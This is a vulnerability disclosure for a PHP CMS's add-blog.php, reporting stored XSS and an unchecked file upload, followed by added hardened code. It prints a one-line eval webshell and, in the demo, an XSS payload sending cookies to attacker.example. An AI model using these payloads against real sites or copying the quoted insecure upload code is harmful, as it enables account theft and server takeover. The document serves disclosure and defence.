Submit #43143: Vogue CMS XSS and File upload vulnerability

Title: Vogue CMS XSS and File upload vulnerability
Description: The Vogue CMS has an XSS vulnerability. The system does not filter input or output at all. Attackers can construct malicious code to steal user and administrator cookies. At the same time, there is a file upload vulnerability in this system, which allows an attacker to get a shell (getshell) from the admin backend. The vulnerable file is vogue/dashboard/add-blog.php:

```php
if(ISSET($_POST['save'])){
    // Only SQL escaping is applied here; nothing is HTML-encoded
    $blog_title  = mysqli_real_escape_string($con,$_POST['blog_title']);
    $blog_desc   = mysqli_real_escape_string($con,$_POST['blog_desc']);
    $blog_detail = mysqli_real_escape_string($con,$_POST['blog_detail']);
    // The only validation performed is on string length
    if ( strlen($blog_title) < 5 ){ $msg=$msg."Blog Title Must Be More Than 5 Char Length.<BR>"; $status= "NOTOK";}
    if ( strlen($blog_desc) > 150 ){ $msg=$msg."Short description Must Be Less Than 150 Char Length.<BR>"; $status= "NOTOK";}
    if ( strlen($blog_detail) < 15 ){ $msg=$msg."Blog Detail Must Be More Than 15 Char Length.<BR>"; $status= "NOTOK";}
    // ... rest of the handler not shown in the submission
}
```

The submitted variables in the source code are only checked for length; there is no protection against XSS, which results in the XSS.

Process to demonstrate:
https://img-blog.csdnimg.cn/8e0b109507c84f67a2803b1e88903068.png
https://img-blog.csdnimg.cn/93511beae80a4dd08c4b7c8da4c95fad.png
https://img-blog.csdnimg.cn/9453329a61924edaa5796b903d7b54e5.png

This file also has an upload vulnerability:

```php
$uploads_dir = 'uploads/blog';
$tmp_name = $_FILES["ufile"]["tmp_name"];
// basename() may prevent filesystem traversal attacks;
// further validation/sanitation of the filename may be appropriate
$name = basename($_FILES["ufile"]["name"]);
// The prefix is a predictable integer; the user-supplied name and extension are kept
$random_digit=rand(0000,9999);
$new_file_name=$random_digit.$name;
// No extension or content-type check before the file lands in the web root
move_uploaded_file($tmp_name, "$uploads_dir/$new_file_name");
```

The file format is not checked when uploading files in the source code, so a Trojan (webshell) file can be uploaded normally.

Process to demonstrate:
https://img-blog.csdnimg.cn/3719e7cac044498680798649bcda1d74.png
https://img-blog.csdnimg.cn/dceadc33a7c2405187c5048aa4f77693.png
https://img-blog.csdnimg.cn/eea7dcec598747fba3ae59d02d80e2a8.png
https://img-blog.csdnimg.cn/b9ad782d226443418f3986c48d5d7ebc.png
https://img-blog.csdnimg.cn/ea270ce3986240ca850dc5acb7b429f9.png

Upload file content:

```php
<?php phpinfo(); @eval($_POST[1]); ?>
```

Download the source code: https://www.sourcecodester.com/php/15517/company-website-cms-php.html
Source: https://www.quan9i.top
User: quan9i (UID 30726)
Submission: 08/08/2022 19:08
Moderation: 08/09/2022 07:59 (13 hours later)
Status: Accepted
VulDB entry: 205838 [SourceCodester Company Website CMS add-blog.php cross site scripting]
Points: 17
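Added example, not code from the submission or from the Company Website CMS / Vogue CMS project: hardened counterparts to the two add-blog.php fragments quoted in the description, showing why SQL escaping does nothing against XSS and how the upload handler should decide what it stores. The function names, the image allow-list, the size limit and the sample inputs in the CLI section are all assumptions constructed for the demonstration.

```php
<?php
// Added example (not project code): hardened versions of the add-blog.php fragments.
// Function names, the MIME allow-list and the sample inputs below are assumptions.
declare(strict_types=1);

// ---- XSS: encode at output time ---------------------------------------------
// mysqli_real_escape_string() only escapes what matters inside a SQL string
// literal (NUL, \n, \r, \, ', ", Ctrl-Z). A payload such as <script>...</script>
// is stored unchanged and fires wherever the blog fields are echoed into HTML.
function render_blog_field(string $stored): string
{
    // Context: HTML text node or double-quoted attribute value.
    return htmlspecialchars($stored, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// ---- Upload: allow-list the content, never trust the client file name -------
const ALLOWED_IMAGE_TYPES = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

/**
 * Returns a server-chosen file name for $tmpPath, or null if the upload must be
 * rejected. The client-supplied name is ignored entirely, so "shell.php" or
 * "shell.php.jpg" can never reach the web root under a name the attacker picked.
 */
function safe_upload_name(string $tmpPath, int $maxBytes = 2 * 1024 * 1024): ?string
{
    if (!is_file($tmpPath) || filesize($tmpPath) === 0 || filesize($tmpPath) > $maxBytes) {
        return null;
    }
    // Sniff the type from the bytes; $_FILES['ufile']['type'] is attacker-controlled.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime === false || !isset(ALLOWED_IMAGE_TYPES[$mime])) {
        return null;
    }
    // Second opinion from the image header parser.
    if (@getimagesize($tmpPath) === false) {
        return null;
    }
    // Unguessable name (replaces rand(0000,9999) . $name); extension comes from the allow-list.
    return bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$mime];
}

/** Drop-in for the move_uploaded_file() block; returns the stored name or null. */
function store_blog_upload(array $file, string $uploadsDir = 'uploads/blog'): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    if (!is_uploaded_file($file['tmp_name'])) {   // must originate from this request
        return null;
    }
    $name = safe_upload_name($file['tmp_name']);
    if ($name === null) {
        return null;
    }
    $dest = rtrim($uploadsDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0644);   // not executable; the web server must also refuse to run PHP from uploads/ (assumed config)
    return $name;
}

// ---- Offline demonstration on constructed inputs ----------------------------
if (PHP_SAPI === 'cli') {
    $payload = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>';
    // addslashes() applies the same quote/backslash escaping as mysqli_real_escape_string()
    // and is used here only so the demo needs no database connection.
    echo "SQL-escaped  : ", addslashes($payload), PHP_EOL;        // <script> tags survive
    echo "HTML-encoded : ", render_blog_field($payload), PHP_EOL; // &lt;script&gt;... is inert

    $tmp = tempnam(sys_get_temp_dir(), 'up');
    // The webshell from the submission, regardless of what file name the client sends.
    file_put_contents($tmp, '<?php phpinfo(); @eval($_POST[1]); ?>');
    var_dump(safe_upload_name($tmp));   // NULL: sniffed as PHP/text, not an allowed image type

    // Constructed 1x1 RGBA PNG: signature + IHDR chunk only (enough for the header checks).
    $png = "\x89PNG\r\n\x1a\n"
         . "\x00\x00\x00\x0dIHDR\x00\x00\x00\x01\x00\x00\x00\x01\x08\x06\x00\x00\x00\x1f\x15\xc4\x89";
    file_put_contents($tmp, $png);
    var_dump(safe_upload_name($tmp));   // string(36) "<32 hex chars>.png"
    unlink($tmp);
}
```

Run it with `php hardened-add-blog.php` (needs the fileinfo and gd-independent getimagesize support that ships with stock PHP). The two checks a practitioner would add to this before trusting it in production are a size cap enforced in php.ini (`upload_max_filesize`) and a web server rule that denies script execution under uploads/blog, so that even a misclassified file cannot be run; the name randomisation only removes the guessable `rand(0000,9999)` prefix from the original.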
